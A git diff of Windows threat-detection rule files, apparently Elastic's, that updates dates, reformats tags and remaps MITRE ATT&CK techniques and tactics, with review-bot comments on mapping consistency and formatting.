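Review bot: The `@@ -114,27 +102,7 @@` hunk deletes the Initial Access `[[rule.threat]]` block (T1195.002 Compromise Software Supply Chain) and the tags hunk drops `"Tactic: Initial Access"`, while the sibling rule execution_apt_solarwinds_backdoor_unusual_child_processes in the next file section keeps the same T1195.002 block and newly adds the `"Tactic: Initial Access"` tag. Judging by their filenames both rules detect child processes of the same SolarWinds backdoor, so one of the two mappings looks inconsistent. Either restore the supply-chain block here or explain in the PR description why only the unusual-child-process variant should carry it.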
diff --git a/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml b/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml index 548fd088051..59cb3fe1d9f 100644 --- a/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml +++ b/rules/windows/execution_apt_solarwinds_backdoor_unusual_child_processes.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/14" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,16 +57,7 @@ references = [ risk_score = 47 rule_id = "93b22c0a-06a0-4131-b830-b10d5e166ff4" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -96,31 +87,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1106" -name = "Native API" -reference = "https://attack.mitre.org/techniques/T1106/" +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" + [[rule.threat.technique.subtechnique]] id = "T1195.002" name = "Compromise Software Supply Chain" reference = "https://attack.mitre.org/techniques/T1195/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/windows/execution_com_object_xwizard.toml b/rules/windows/execution_com_object_xwizard.toml index c7deeed356b..fa047e4e93e 100644 --- a/rules/windows/execution_com_object_xwizard.toml +++ b/rules/windows/execution_com_object_xwizard.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/20" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "system", "crowdstrike"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -67,20 +67,7 @@ references = [ risk_score = 47 rule_id = "1a6075b0-7479-450e-8fe7-b8b8438ac570" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -105,19 +92,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" + [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/execution_command_prompt_connecting_to_the_internet.toml b/rules/windows/execution_command_prompt_connecting_to_the_internet.toml index 764af8ffaf6..f9e4f0e18a5 100644 
--- a/rules/windows/execution_command_prompt_connecting_to_the_internet.toml +++ b/rules/windows/execution_command_prompt_connecting_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/02/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -100,16 +100,7 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 21 rule_id = "89f9a4b0-9f8f-4ee0-8823-c4751a6d6696" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne"] type = "eql" query = ''' 
@@ -134,29 +125,39 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/execution_command_shell_started_by_svchost.toml b/rules/windows/execution_command_shell_started_by_svchost.toml index 6424adbe5c9..96e430f08d1 100644 --- a/rules/windows/execution_command_shell_started_by_svchost.toml +++ b/rules/windows/execution_command_shell_started_by_svchost.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/01/29" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
@@ -132,17 +132,31 @@ not process.args:(".\inetsrv\iissetup.exe /keygen " or "C:\Program" or "C:\Progr [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" + +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.new_terms] field = "new_terms_fields" value = ["process.command_line"] diff --git a/rules/windows/execution_command_shell_started_by_unusual_process.toml b/rules/windows/execution_command_shell_started_by_unusual_process.toml index 3db3ebe2ccf..3dc455db3cd 100644 --- a/rules/windows/execution_command_shell_started_by_unusual_process.toml +++ b/rules/windows/execution_command_shell_started_by_unusual_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/21" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -114,14 +114,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/execution_command_shell_via_rundll32.toml b/rules/windows/execution_command_shell_via_rundll32.toml index c0273819d72..b4ad329ff0c 100644 --- a/rules/windows/execution_command_shell_via_rundll32.toml +++ b/rules/windows/execution_command_shell_via_rundll32.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,20 +58,7 @@ RunDLL32 is a legitimate Windows utility used to execute functions in DLLs, ofte risk_score = 21 rule_id = "9ccf3ce0-0057-440a-91f5-870c6ad39093" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Credential Access", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -87,10 +74,30 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1218"
+name = "System Binary Proxy Execution"
+reference = "https://attack.mitre.org/techniques/T1218/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1218.011"
+name = "Rundll32"
+reference = "https://attack.mitre.org/techniques/T1218/011/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
@@ -101,39 +108,7 @@ id = "T1059.003"
 name = "Windows Command Shell"
 reference = "https://attack.mitre.org/techniques/T1059/003/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1552"
-name = "Unsecured Credentials"
-reference = "https://attack.mitre.org/techniques/T1552/"
-
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1218"
-name = "System Binary Proxy Execution"
-reference = "https://attack.mitre.org/techniques/T1218/"
-[[rule.threat.technique.subtechnique]]
-id = "T1218.011"
-name = "Rundll32"
-reference = "https://attack.mitre.org/techniques/T1218/011/"
-
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml b/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml
index c728a7ba058..a09a3c65442 100644
--- a/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml
+++ b/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/09/25"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/11/11"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -103,41 +103,21 @@ sequence by process.parent.entity_id with maxspan=1m
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.001"
-name = "PowerShell"
-reference = "https://attack.mitre.org/techniques/T1059/001/"
+id = "T1127"
+name = "Trusted Developer Utilities Proxy Execution"
+reference = "https://attack.mitre.org/techniques/T1127/"
 [[rule.threat.technique.subtechnique]]
-id = "T1059.005"
-name = "Visual Basic"
-reference = "https://attack.mitre.org/techniques/T1059/005/"
-
-
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1216"
-name = "System Script Proxy Execution"
-reference = "https://attack.mitre.org/techniques/T1216/"
+id = "T1127.001"
+name = "MSBuild"
+reference = "https://attack.mitre.org/techniques/T1127/001/"
 [[rule.threat.technique]]
 id = "T1218"
 name = "System Binary Proxy Execution"
 reference = "https://attack.mitre.org/techniques/T1218/"
-[[rule.threat.technique.subtechnique]]
-id = "T1218.003"
-name = "CMSTP"
-reference = "https://attack.mitre.org/techniques/T1218/003/"
 [[rule.threat.technique.subtechnique]]
 id = "T1218.004"
@@ -164,7 +144,6 @@ id = "T1218.011"
 name = "Rundll32"
 reference = "https://attack.mitre.org/techniques/T1218/011/"
-
 [[rule.threat.technique]]
 id = "T1220"
 name = "XSL Script Processing"
@@ -174,15 +153,36 @@ reference = "https://attack.mitre.org/techniques/T1220/"
 id = "T1497"
 name = "Virtualization/Sandbox Evasion"
 reference = "https://attack.mitre.org/techniques/T1497/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1497.003"
 name = "Time Based Checks"
 reference = "https://attack.mitre.org/techniques/T1497/003/"
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1047"
+name = "Windows Management Instrumentation"
+reference = "https://attack.mitre.org/techniques/T1047/"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.001"
+name = "PowerShell"
+reference = "https://attack.mitre.org/techniques/T1059/001/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/windows/execution_downloaded_shortcut_files.toml b/rules/windows/execution_downloaded_shortcut_files.toml
index d4347a8e04b..9adeb9ceb50 100644
--- a/rules/windows/execution_downloaded_shortcut_files.toml
+++ b/rules/windows/execution_downloaded_shortcut_files.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/09/02"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -18,14 +18,7 @@ name = "Downloaded Shortcut Files"
 risk_score = 47
 rule_id = "39157d52-4035-44a8-9d1a-6f8c5f580a07"
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -70,41 +63,18 @@ Shortcut files (.lnk) are used in Windows environments to link to executable fil
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1204"
-name = "User Execution"
-reference = "https://attack.mitre.org/techniques/T1204/"
-[[rule.threat.technique.subtechnique]]
-id = "T1204.002"
-name = "Malicious File"
-reference = "https://attack.mitre.org/techniques/T1204/002/"
-
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1566"
 name = "Phishing"
 reference = "https://attack.mitre.org/techniques/T1566/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1566.001"
 name = "Spearphishing Attachment"
 reference = "https://attack.mitre.org/techniques/T1566/001/"
-[[rule.threat.technique.subtechnique]]
-id = "T1566.002"
-name = "Spearphishing Link"
-reference = "https://attack.mitre.org/techniques/T1566/002/"
-
-
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-
diff --git a/rules/windows/execution_downloaded_url_file.toml b/rules/windows/execution_downloaded_url_file.toml
index 1e01769894a..c14b3d977e2 100644
--- a/rules/windows/execution_downloaded_url_file.toml
+++ b/rules/windows/execution_downloaded_url_file.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/09/02"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/06/11"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -18,14 +18,7 @@ name = "Downloaded URL Files"
 risk_score = 47
 rule_id = "cd82e3d6-1346-4afd-8f22-38388bbf34cb"
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide"
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -72,36 +65,13 @@ URL shortcut files, typically used for quick access to web resources, can be exp
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1204"
-name = "User Execution"
-reference = "https://attack.mitre.org/techniques/T1204/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1566"
 name = "Phishing"
 reference = "https://attack.mitre.org/techniques/T1566/"
-[[rule.threat.technique.subtechnique]]
-id = "T1566.001"
-name = "Spearphishing Attachment"
-reference = "https://attack.mitre.org/techniques/T1566/001/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1566.002"
-name = "Spearphishing Link"
-reference = "https://attack.mitre.org/techniques/T1566/002/"
-
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-
diff --git a/rules/windows/execution_enumeration_via_wmiprvse.toml b/rules/windows/execution_enumeration_via_wmiprvse.toml
index 15f89225424..cbb812845f3 100644
--- a/rules/windows/execution_enumeration_via_wmiprvse.toml
+++ b/rules/windows/execution_enumeration_via_wmiprvse.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/01/19"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -63,20 +63,7 @@ Windows Management Instrumentation (WMI) is a powerful framework for managing da
 risk_score = 21
 rule_id = "770e0c4d-b998-41e5-a62e-c7901fd7f470"
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Data Source: Windows Security Event Logs",
- "Data Source: Microsoft Defender for Endpoint",
- "Data Source: Sysmon",
- "Data Source: SentinelOne",
- "Data Source: Crowdstrike",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -99,51 +86,51 @@ process where host.os.type == "windows" and event.type == "start" and process.co
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1047"
-name = "Windows Management Instrumentation"
-reference = "https://attack.mitre.org/techniques/T1047/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1016"
 name = "System Network Configuration Discovery"
 reference = "https://attack.mitre.org/techniques/T1016/"
-[[rule.threat.technique.subtechnique]]
-id = "T1016.001"
-name = "Internet Connection Discovery"
-reference = "https://attack.mitre.org/techniques/T1016/001/"
-
 [[rule.threat.technique]]
 id = "T1018"
 name = "Remote System Discovery"
 reference = "https://attack.mitre.org/techniques/T1018/"
+[[rule.threat.technique]]
+id = "T1033"
+name = "System Owner/User Discovery"
+reference = "https://attack.mitre.org/techniques/T1033/"
+
 [[rule.threat.technique]]
 id = "T1057"
 name = "Process Discovery"
 reference = "https://attack.mitre.org/techniques/T1057/"
+[[rule.threat.technique]]
+id = "T1082"
+name = "System Information Discovery"
+reference = "https://attack.mitre.org/techniques/T1082/"
+
 [[rule.threat.technique]]
 id = "T1087"
 name = "Account Discovery"
 reference = "https://attack.mitre.org/techniques/T1087/"
-[[rule.threat.technique]]
-id = "T1518"
-name = "Software Discovery"
-reference = "https://attack.mitre.org/techniques/T1518/"
-
-
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1047"
+name = "Windows Management Instrumentation"
+reference = "https://attack.mitre.org/techniques/T1047/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/windows/execution_from_unusual_path_cmdline.toml b/rules/windows/execution_from_unusual_path_cmdline.toml
index 2b11f8ec924..82a8d3aa8d2 100644
--- a/rules/windows/execution_from_unusual_path_cmdline.toml
+++ b/rules/windows/execution_from_unusual_path_cmdline.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/10/30"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/05/05"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
@@ -236,36 +236,66 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.003"
-name = "Windows Command Shell"
-reference = "https://attack.mitre.org/techniques/T1059/003/"
-
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1036"
 name = "Masquerading"
 reference = "https://attack.mitre.org/techniques/T1036/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1036.005"
 name = "Match Legitimate Resource Name or Location"
 reference = "https://attack.mitre.org/techniques/T1036/005/"
+[[rule.threat.technique]]
+id = "T1218"
+name = "System Binary Proxy Execution"
+reference = "https://attack.mitre.org/techniques/T1218/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1218.003"
+name = "CMSTP"
+reference = "https://attack.mitre.org/techniques/T1218/003/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1218.004"
+name = "InstallUtil"
+reference = "https://attack.mitre.org/techniques/T1218/004/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1218.005"
+name = "Mshta"
+reference = "https://attack.mitre.org/techniques/T1218/005/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1218.009"
+name = "Regsvcs/Regasm"
+reference = "https://attack.mitre.org/techniques/T1218/009/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1218.010"
+name = "Regsvr32"
+reference = "https://attack.mitre.org/techniques/T1218/010/"
+[[rule.threat.technique.subtechnique]]
+id = "T1218.011"
+name = "Rundll32"
+reference = "https://attack.mitre.org/techniques/T1218/011/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml b/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml
index 62b894c0d72..2a1c60b804f 100644
--- a/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml
+++ b/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/08/26"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
@@ -113,16 +113,7 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana-
 risk_score = 21
 rule_id = "b29ee2be-bf99-446c-ab1a-2dc0183394b8"
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Resources: Investigation Guide",
- "Data Source: Elastic Defend",
- "Data Source: Sysmon",
- "Data Source: SentinelOne",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne"]
 type = "eql"
 query = '''
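Review bot: In the `@@ -236,36 +236,66 @@` hunk of execution_from_unusual_path_cmdline.toml, the added `[[rule.threat.technique.subtechnique]]` entry for T1218.011 (Rundll32) is appended directly after the T1218.010 `reference` line with no blank separator, unlike every other sub-technique added in the same hunk, and the `[rule.threat.tactic]` context line follows it just as tightly; a blank `+` line before `[[rule.threat.technique.subtechnique]]` / `id = "T1218.011"` would keep the Defense Evasion block consistent with the rest. The same missing separators appear in the added T1566.001 entry in execution_initial_access_foxmail_exploit.toml and throughout the added T1203, T1204 and T1204.002 entries in execution_ms_office_written_file.toml. This hunk starts on the previous line and ends here; the technique content itself reads cleanly.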
@@ -140,36 +131,36 @@ sequence by process.entity_id
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1204"
-name = "User Execution"
-reference = "https://attack.mitre.org/techniques/T1204/"
-[[rule.threat.technique.subtechnique]]
-id = "T1204.002"
-name = "Malicious File"
-reference = "https://attack.mitre.org/techniques/T1204/002/"
-
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1218"
 name = "System Binary Proxy Execution"
 reference = "https://attack.mitre.org/techniques/T1218/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1218.001"
 name = "Compiled HTML File"
 reference = "https://attack.mitre.org/techniques/T1218/001/"
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1204"
+name = "User Execution"
+reference = "https://attack.mitre.org/techniques/T1204/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1204.002"
+name = "Malicious File"
+reference = "https://attack.mitre.org/techniques/T1204/002/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
